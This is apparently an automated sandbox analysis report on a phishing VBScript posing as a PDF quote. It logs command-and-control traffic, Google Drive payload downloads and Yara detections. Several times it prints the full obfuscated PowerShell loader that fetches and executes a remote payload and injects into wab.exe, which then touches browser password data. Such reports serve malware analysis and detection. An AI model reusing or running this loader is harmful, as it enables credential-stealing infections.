Source: unknown TCP traffic detected without corresponding DNS query: 24.199.107.111
Source: unknown TCP traffic detected without corresponding DNS query: 24.199.107.111
Source: unknown TCP traffic detected without corresponding DNS query: 24.199.107.111
Source: unknown TCP traffic detected without corresponding DNS query: 24.199.107.111
Source: unknown TCP traffic detected without corresponding DNS query: 24.199.107.111
Source: unknown TCP traffic detected without corresponding DNS query: 24.199.107.111
Source: unknown TCP traffic detected without corresponding DNS query: 24.199.107.111
Source: unknown TCP traffic detected without corresponding DNS query: 24.199.107.111
Source: unknown TCP traffic detected without corresponding DNS query: 24.199.107.111
Source: unknown TCP traffic detected without corresponding DNS query: 24.199.107.111
Source: unknown TCP traffic detected without corresponding DNS query: 24.199.107.111
Source: unknown TCP traffic detected without corresponding DNS query: 24.199.107.111
Source: unknown TCP traffic detected without corresponding DNS query: 24.199.107.111
Source: unknown TCP traffic detected without corresponding DNS query: 24.199.107.111
Source: unknown TCP traffic detected without corresponding DNS query: 24.199.107.111
Source: unknown TCP traffic detected without corresponding DNS query: 24.199.107.111
Source: unknown TCP traffic detected without corresponding DNS query: 24.199.107.111
Source: unknown TCP traffic detected without corresponding DNS query: 24.199.107.111
Source: unknown TCP traffic detected without corresponding DNS query: 24.199.107.111
Source: unknown TCP traffic detected without corresponding DNS query: 24.199.107.111
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1NuRs33pJXEZqHl9cIafOpya6u7I1vPKV HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1NuRs33pJXEZqHl9cIafOpya6u7I1vPKV&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1w6J0xEPtolIyRbLIjhnxbM_QNNOpTZFW HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1w6J0xEPtolIyRbLIjhnxbM_QNNOpTZFW&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: unknown HTTP traffic detected: POST /index.php/927339792 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173C58Content-Length: 180Connection: close
Source: wab.exe, 00000009.00000002.3336499423.00000000054C0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2559983367.00000000054C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://24.199.107.111/index.php/927339792
Source: wab.exe, 00000009.00000003.2559983367.00000000054C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://24.199.107.111/index.php/927339792r
Source: powershell.exe, 00000005.00000002.2536676585.0000000007ACA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microv
Source: wscript.exe, 00000001.00000002.2070838707.000002293C000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000001.00000003.2041007560.000002293C08B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2041418197.000002293C0B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?daccf7ef1ada1
Source: wscript.exe, 00000001.00000003.2069109957.0000022939F3E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.2070611332.0000022939FF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2069820725.0000022939FF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cablugtbil.OcX
Source: wscript.exe, 00000001.00000003.2069109957.0000022939F3E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.2070611332.0000022939FF3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2069820725.0000022939FF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/eni
Source: wscript.exe, 00000001.00000003.2041129175.000002293C040000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2041244405.000002293C067000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?daccf7ef1a
Source: powershell.exe, 00000002.00000002.2611397020.000001A0CC6DA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.2611397020.000001A0CC716000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2698898787.000001A0DA98C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2532896490.0000000006173000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2528075391.0000000005269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2611397020.000001A0CA921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2528075391.0000000005111000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2528075391.0000000005269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2611397020.000001A0CA921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2528075391.0000000005111000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.2611397020.000001A0CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CADAA000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498305991.00000000054C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498442967.00000000054C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000005.00000002.2532896490.0000000006173000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2532896490.0000000006173000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2532896490.0000000006173000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2611397020.000001A0CAB49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC1E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
Source: wab.exe, 00000009.00000002.3336499423.0000000005448000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: wab.exe, 00000009.00000002.3336499423.0000000005448000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/4
Source: powershell.exe, 00000002.00000002.2611397020.000001A0CAB49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1NuRs33pJXEZqHl9cIafOpya6u7I1vPKVP
Source: powershell.exe, 00000005.00000002.2528075391.0000000005269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1NuRs33pJXEZqHl9cIafOpya6u7I1vPKVXR6lT
Source: wab.exe, 00000009.00000002.3336499423.0000000005480000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3347616768.0000000020550000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1w6J0xEPtolIyRbLIjhnxbM_QNNOpTZFW
Source: powershell.exe, 00000002.00000002.2611397020.000001A0CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CADAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
Source: wab.exe, 00000009.00000002.3336499423.00000000054C0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2523247767.00000000054BF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2559983367.00000000054C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
Source: powershell.exe, 00000002.00000002.2611397020.000001A0CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CADAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1NuRs33pJXEZqHl9cIafOpya6u7I1vPKV&export=download
Source: wab.exe, 00000009.00000002.3336499423.0000000005480000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1w6J0xEPtolIyRbLIjhnxbM_QNNOpTZFW&export=download
Source: powershell.exe, 00000005.00000002.2528075391.0000000005269000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2611397020.000001A0CBD7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2698898787.000001A0DA98C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2532896490.0000000006173000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.2611397020.000001A0CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CADAA000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498305991.00000000054C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498442967.00000000054C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.2611397020.000001A0CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CADAA000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498305991.00000000054C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498442967.00000000054C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.2611397020.000001A0CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CADAA000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498305991.00000000054C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498442967.00000000054C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.2611397020.000001A0CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CADAA000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498305991.00000000054C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498442967.00000000054C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.2611397020.000001A0CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CADAA000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498305991.00000000054C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498442967.00000000054C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown HTTPS traffic detected: 173.194.219.138:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 173.194.219.138:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.5:49716 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi32_2228.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6784, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2228, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 8444
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 8444
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 8444 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 8444 Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.Am
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.Am Jump to behavior
Contains functionality to call native functions
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_045C0256 Sleep,NtProtectVirtualMemory, 9_2_045C0256
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F4B596 2_2_00007FF848F4B596
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F4C342 2_2_00007FF848F4C342
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0384F258 5_2_0384F258
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0384FB28 5_2_0384FB28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0384EF10 5_2_0384EF10
Java / VBScript file with very long strings (likely obfuscated code)
Source: Request for Proposal Quote_2414976#U00b7pdf.vbs Initial sample: Strings found which are bigger than 50
Yara signature match
Source: amsi32_2228.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6784, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2228, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@14/13@2/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\gennemsgnings.Fas Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1308:120:WilError_03
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\Rundturens.txt Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Request for Proposal Quote_2414976#U00b7pdf.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6784
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2228
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: wab.exe, 00000009.00000003.2527087056.0000000002745000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Request for Proposal Quote_2414976#U00b7pdf.vbs ReversingLabs: Detection: 13%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Request for Proposal Quote_2414976#U00b7pdf.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu 